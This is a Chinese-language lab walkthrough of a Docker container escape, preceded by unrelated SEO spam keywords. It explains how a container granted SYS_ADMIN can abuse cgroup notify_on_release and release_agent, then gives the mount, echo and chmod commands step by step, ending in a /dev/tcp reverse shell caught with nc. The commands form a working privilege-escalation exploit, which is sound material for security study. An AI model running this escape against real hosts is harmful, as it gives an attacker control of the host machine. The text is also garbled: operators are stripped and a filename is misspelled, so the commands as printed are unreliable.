清远企业网站建设公司,网上有哪些正规赚钱的平台,有道翻译网站 做翻译,网站如何做入支付接口1.漏洞原理Docker容器不同于虚拟机#xff0c;它共享宿主机操作系统内核。宿主机和容器之间通过内核命名空间#xff08;namespaces#xff09;、内核Capabilities、CGroups#xff08;control groups#xff09;等技术进行隔离。若启动docker容器时给主机一个--cap-addSY…1.漏洞原理Docker容器不同于虚拟机它共享宿主机操作系统内核。宿主机和容器之间通过内核命名空间namespaces、内核Capabilities、CGroupscontrol groups等技术进行隔离。若启动docker容器时给主机一个--cap-addSYS_ADMIN的权限攻击者可以在容器内通过挂载宿主机cgroup并利用cgroup notify_on_release的特性在宿主机执行shell从而实现容器逃逸。注释cgroup限制资源分配的技术限制docker的特定资源Linux下SYS_ADMIN权限允许执行系统管理任务如加载或卸载文件系统、设置磁盘配额等notify_on_release特性这个参数值是Boolean型1或0。分别可以启动和禁用释放代理的指令。如果notify_on_release启用即值为1时当cgroup不再包含任何任务时即cgroup的tasks文件里的PID为空时系统内核会默认执行release_agent参数指定的文件里的内容。2实验环境系统环境ubuntudocker版本18.09挂载的ununtu版本18.043漏洞复现3.1安装Ubuntu docker 镜像命令docker pull ubuntu:18.043.2 SYS_ADMIN的权限运行ubuntu容器命令docker run --rm -it --cap-addSYS_ADMIN --security-opt apparmorunconfined ubuntu:18.04 /bin/bash--security-opt apparmorunconfined这两个选项默认的开启AppArmor配置保证了docker以严格模式运行使用权限限制较高改为unconfined表示表示去除Docker默认的AppArmor配置即不开启严格模式运行容器。结果3.3查看docker添加的权限命令cat /proc/$$/status | grep Cap结果查看CapEff的具体权限命令capsh --decode00000000a82425fb结果其中SYS_ADMIN权限添加成功3.4挂载cgroup及其选项命令mkdir /tmp/cgrp mount -t cgroup -o memory cgroup /tmp/cgrp 结果查看挂载命令ls /tmp/cgrp注意挂载完成宿主机的memory后主要是为了成功设置notify_on_release为1 以及在release_agent中加入文件。3.5在cgroup中新建一个子系统新建cgroup子系统是为了防止影响宿主机的正常运行命令mkdir /tmp/cgrp/x将使用x文件作为POC操作的主要目标3.6设置notify_on_release为值1命令echo 1 /tmp/cgrp/x/notify_no_release结果3.7将release_agent指定为容器在宿主机上的cmd文件3.7.1寻找容器路径由于最后需要运行的为release_agent中的内容文件的位置在宿主机上所以需要寻找宿主机上容器的路径以便于反弹release_agent中的内容命令host_pathsed -n s/.*\perdir\([^,]*\).*/\1/p /etc/mtab结果3.7.2写入shell文件cmd到容器路径中在这个目录里创建一个cmd文件并把它作为/tmp/cgrp/release_agent参数指定的文件命令echo $host_path/cmd /tmp/cgrp/release_agent结果3.8创建写入cmd文件应该在docker的根目录下创建原因由于docker共享宿主机磁盘即docker在系统下有自己的文件夹所以docker的根目录下创建的文件也会体现于系统中。命令echo #!/bin/sh /cmd
echo sh -i /dev/tcp/127.0.0.1/8443 01 /cmd #使用同一台宿主机8443端口进行shell回弹监听结果在宿主机中查看cmd文件创建成功。3.9给cmd文件执行权限chmod ax /cmd3.10使用本机进行回弹端口监听重新打开一个会话用于回弹端口监听命令nc -lvvp 84433.11执行cmd文件命令sh -c echo \$\$ /tmp/cgrp/x/cgroup.procs该命令启动一个sh进程将sh进程的PID写入到/tmp/cgrp/x/cgroup.procs里这里的\$\$表示sh进程的PID。在执行完sh -c之后sh进程自动退出这样cgroup /tmp/cgrp/x里不再包含任何任务/tmp/cgrp/release_agent文件里的shell将被操作系统内核执行即自动执行cmd文件。3.12查看回弹监听结果查看权限宿主机成功回弹逃逸成功。
